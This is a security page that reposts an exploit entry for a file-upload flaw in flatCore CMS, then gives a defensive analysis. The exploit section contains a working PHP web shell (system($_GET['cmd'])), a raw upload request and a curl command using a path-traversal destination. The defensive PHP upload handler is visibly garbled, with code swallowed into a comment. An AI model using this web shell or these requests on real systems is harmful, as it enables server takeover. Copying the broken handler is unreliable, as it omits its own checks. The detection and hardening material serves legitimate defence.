flatCore 1.5.5 - Arbitrary File Upload

Exploit Author: CodeSecLab Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2025-04-10

# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: 1.5.5
# Tested on: Ubuntu Windows
# CVE : CVE-2019-10652
PoC：
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:

POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>

-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream

<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"

../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"

<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami

PoC 
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability

# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.

# Step 2: Upload a malicious PHP file using the file upload feature

# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php

# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
    -H "Content-Type: multipart/form-data" \
    -F "file=@shell.php" \
    -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
    -F "upload_destination=../content/files" \
    -F "file_mode=overwrite" \
    -b "PHPSESSID=YOUR_SESSION_ID_HERE"

# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID

# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"

This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]

flatCore 1.5.5 — Arbitrary File Upload (CVE-2019-10652): Analysis, Impact, and Remediation

flatCore is an open-source CMS that, in older releases, was affected by an arbitrary file upload vulnerability (recorded as CVE-2019-10652). This class of vulnerability lets an authenticated attacker place files (including web-executable scripts) under a web-accessible location, potentially leading to remote code execution (RCE) and full site compromise. This article explains the technical root cause at a high level, the real-world impact, how to detect exploitation attempts, and recommended secure mitigations and hardening practices.

Summary and Risk Profile

Vulnerability class: Unrestricted / insufficiently validated file upload
Affected versions: flatCore versions prior to fixed releases (notably referenced in CVE-2019-10652)
Attack requirements: Administrative authentication to the flatCore panel (the exploit requires a valid session/CSRF in the reported cases)
Impact: Upload of server-side scripts (e.g., PHP), remote command execution, data exfiltration, persistent backdoor installation
Likelihood: Medium if an administrative account is compromised; however, impact is high

Technical root cause (high level)

The core problem for many file upload vulnerabilities lies in insufficient validation of three areas:

File type and content — trusting client-supplied MIME types or file extensions instead of inspecting file content.
Upload destination and path normalization — allowing directory traversal or arbitrary target directories that are web-accessible.
Permissions and execution controls — permitting uploaded files to be served and executed by the webserver.

In the flatCore case, these weaknesses allowed an authenticated admin-level user to upload server-side script files into web-accessible folders, enabling execution via HTTP requests.

Real-world impact and use cases

Post-auth compromise: An attacker with stolen admin credentials can upload a web shell to persist and execute arbitrary commands on the host.
Privilege escalation: If the web process has access to sensitive data or other systems, uploaded code can be used to pivot laterally.
Supply chain and site defacement: Malicious uploads can be used to modify content, inject malware, or distribute further payloads to visitors.

Detection and monitoring

Look for the following signals in server logs, application logs, and WAF/IDS alerts. These are detection ideas — adjust to your environment and avoid relying on a single indicator.

HTTP POST requests to administrative upload endpoints (e.g., POST to upload script endpoints) originating from admin accounts or unknown IPs.
Payload names that include executable extensions (.php, .phtml) or unusual file extensions uploaded to web-accessible directories.
Subsequent GET requests to newly created files in upload directories — often the attacker will trigger the uploaded script right away.
Elevated shell-like activity or new processes spawned by the web server user around the time of suspicious uploads.

Example detection rule (conceptual): alert on multipart/form-data uploads where the filename contains server-side extensions and the target path is a web-accessible upload folder. Implement and tune these in IDS/WAF tools — avoid blind blocking until tested in your environment.

Immediate remediation steps

Upgrade flatCore to a patched version provided by the project or vendor that addresses CVE-2019-10652. If an official patch is unavailable, apply the application's recommended fixes immediately.
Audit administrative accounts and rotate passwords; enforce multi-factor authentication for admin logins.
Inspect site content directories for unexpected/unknown files and remove confirmed malicious files. Treat the host as compromised if a web shell is discovered — perform a full incident response.
Restrict write permissions: ensure web-upload directories are not writable by the webserver user unless necessary, and avoid placing uploads in locations where code is executed.

Long-term mitigations and secure design

Whitelist accepted file types (images, PDFs) and validate using server-side content inspection (not solely extension or client-provided MIME type).
Sanitize and normalize upload destinations: disallow user-controllable path traversal and prohibit arbitrary destination selection.
Store uploaded content outside the webroot where possible; serve files via a controlled, non-executable delivery path.
Use content scanning / antivirus for uploaded files and check for embedded interpretable payloads (e.g., PHP tags).
Apply least privilege file permissions and use server-side configuration to prevent code execution in upload directories.

Secure file upload example (PHP — defensive pattern)

<?php
// Example: secure file upload handler (defensive pattern)
//  - Uses finfo for MIME detection
//  - Allows only a whitelist of safe extensions
//  - Stores files outside webroot and generates unique filenames
//  - Rejects files containing "file($file['tmp_name']);
$validMimes = ['image/jpeg','image/png','image/gif','application/pdf'];
if (!in_array($mime, $validMimes, true)) {
    http_response_code(403);
    exit('Invalid MIME type');
}

// Quick content scan to detect server-side script markers
$contents = file_get_contents($file['tmp_name']);
if (strpos($contents, '<?php') !== false || stripos($contents, '<script') !== false) {
    http_response_code(403);
    exit('Potentially dangerous content');
}

// Generate safe filename and move to storage outside webroot
$safeName = bin2hex(random_bytes(16)) . '.' . $ext;
$destination = $uploadDir . $safeName;
if (!move_uploaded_file($file['tmp_name'], $destination)) {
    http_response_code(500);
    exit('Failed to store file');
}
// Restrict permissions
chmod($destination, 0640);

echo 'OK';
?>

Explanation: This handler enforces a strict whitelist of extensions and MIME types, inspects the file contents for obvious server-side code markers, stores files outside the web root under randomized names, and sets restrictive permissions. These measures reduce the chance of an uploaded file being executed by the webserver.

Preventing execution in upload directories (web server configuration)

Even with application controls, defend in depth by configuring the web server to disallow execution of script files in upload locations.

Server	Example
Apache (.htaccess)	`<FilesMatch "\.(php\|php5\|phtml\|pl\|py)$"> Require all denied </FilesMatch>`
Nginx (location block)	`location /uploads/ { root /var/www/; location ~ \.(php\|phtml)$ { deny all; } }`

Explanation: These examples show how to prevent the webserver from executing common script file types within an upload directory. Use such configuration to make uploaded files inert at the web layer.

WAF and IDS hardening tips

Create rules to flag/ block multipart uploads where the filename contains server-side file extensions (e.g., .php) or suspicious characters.
Alert on POSTs to admin-only upload endpoints originated from non-admin IPs or outside normal business hours.
Throttle large or repeated uploads from the same session and require CSRF token validation on all state-changing endpoints.

Safe testing and responsible disclosure

When validating that your environment is no longer vulnerable:

Test only in isolated, non-production environments or on systems you own or have explicit authorization to test.
Avoid uploading live malicious payloads — use benign files or well-known test files and confirm application-level protections.
If you discover a vulnerability in a third-party system, follow responsible disclosure practices: document the issue, contact the vendor or project maintainers privately, and avoid public exploitation posts until a patch is available.

Practical incident response checklist (if compromise suspected)

Immediately isolate affected systems and revoke administrative credentials or session cookies.
Preserve logs and use forensic techniques to determine the scope and timeline of the compromise.
Search for and remove any uploaded scripts, backdoors, and scheduled tasks; assume persistence mechanisms exist and treat the host as compromised until fully verified.
Rebuild or fully reimage systems if necessary, following evidence-based containment and eradication steps.

References and further reading

Official vendor/project repository and change logs for flatCore — check for security advisories and fixed versions.
OWASP: Unrestricted File Upload (guidance and mitigation patterns).
Web server documentation for Apache/Nginx hardening and directory execution controls.

Conclusion: Arbitrary file upload vulnerabilities such as CVE-2019-10652 are high-impact when combined with administrative access. Mitigation requires a layered approach: patch vulnerable software, harden application logic, restrict execution via webserver configuration, monitor for suspicious uploads, and practice safe testing and incident response.